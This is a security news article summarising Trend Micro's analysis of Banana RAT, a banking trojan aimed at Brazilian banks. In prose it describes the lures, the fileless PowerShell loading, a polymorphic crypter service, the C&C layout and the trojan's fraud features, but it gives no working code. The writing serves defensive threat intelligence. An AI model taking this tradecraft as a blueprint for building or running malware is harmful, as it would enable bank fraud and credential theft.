Banana RAT: Trend Micro Maps Full Attack Chain of Brazilian Banking Trojan
Trend Micro researchers have reconstructed the complete operational model of Banana RAT, a banking trojan attributed to the SHADOW-WATER-063 cluster that targets Brazilian financial institutions.
Trend Micro's Managed Detection and Response (MDR) team has published a detailed analysis of Banana RAT, a banking trojan operated by the threat cluster tracked as SHADOW-WATER-063. The investigation is notable because researchers recovered both server-side tooling from attacker infrastructure and client-side telemetry from compromised hosts, enabling a full-chain reconstruction of the malware's operation. The findings, released on May 19, 2026, reveal a sophisticated financially motivated campaign exclusively targeting Brazilian financial institutions.
The attack chain begins with victim luring via WhatsApp or phishing URLs, directing targets to download a malicious batch file (Consultar_NF-e.bat) from a campaign-specific domain such as convitemundial2026[.]com. The batch file launches an obfuscated PowerShell command that silently fetches a second-stage payload (msedge.txt) entirely in memory, ensuring no decrypted file ever touches disk. This fileless execution pattern uses AES-256-CBC wrapped payloads and ScriptBlock::Create to evade detection and persistence controls.
On the server side, the operator maintains a clean, unobfuscated PowerShell banker as a master source file. This source feeds a FastAPI-based crypter service that applies multiple obfuscation layers and produces unique, polymorphic builds. The crypter maintains a pre-generated pool of 100 to 200 ready builds at all times, each published as payload.php and consumed exactly once per victim request, ensuring every delivered sample is byte-unique. A separate analytics dashboard provides real-time visibility into campaign reach by country, ISP, operating system, and client.
Once active, the malware establishes persistence and opens a TCP session to the operator's command-and-control host on port 443. The client functions as a full remote fraud and surveillance module, combining real-time screen streaming, operator-driven input control, banking-aware overlay injection, QR/PIX transaction manipulation, and continuous keylogging. These capabilities enable interactive credential theft and unauthorized financial transaction execution, with a Pix QR interception subsystem that exists exclusively for the Brazilian market.
The infrastructure design deliberately separates delivery infrastructure from command-and-control infrastructure. If the delivery host is taken down, existing infections continue communicating with the C&C host unaffected, and if the C&C host is disrupted, the delivery pipeline remains intact for the next campaign. This geometry gives the operator operational resilience and complicates takedown efforts.
Trend Micro attributes the operation with high confidence to Brazilian Portuguese-speaking operators exhibiting Tetrade-adjacent tradecraft, with exclusive targeting of 16 Brazilian financial institutions. The company is coordinating with the Federação Brasileira de Bancos (FEBRABAN) to share threat intelligence and support the protection of Brazilian financial institutions and their customers.
The analysis underscores the growing sophistication of banking trojans in Latin America, where financial malware operators continue to innovate with fileless execution, polymorphic payload generation, and targeted fraud capabilities. The full report provides defenders with a rare end-to-end view of a live banking trojan operation, from build server to endpoint compromise.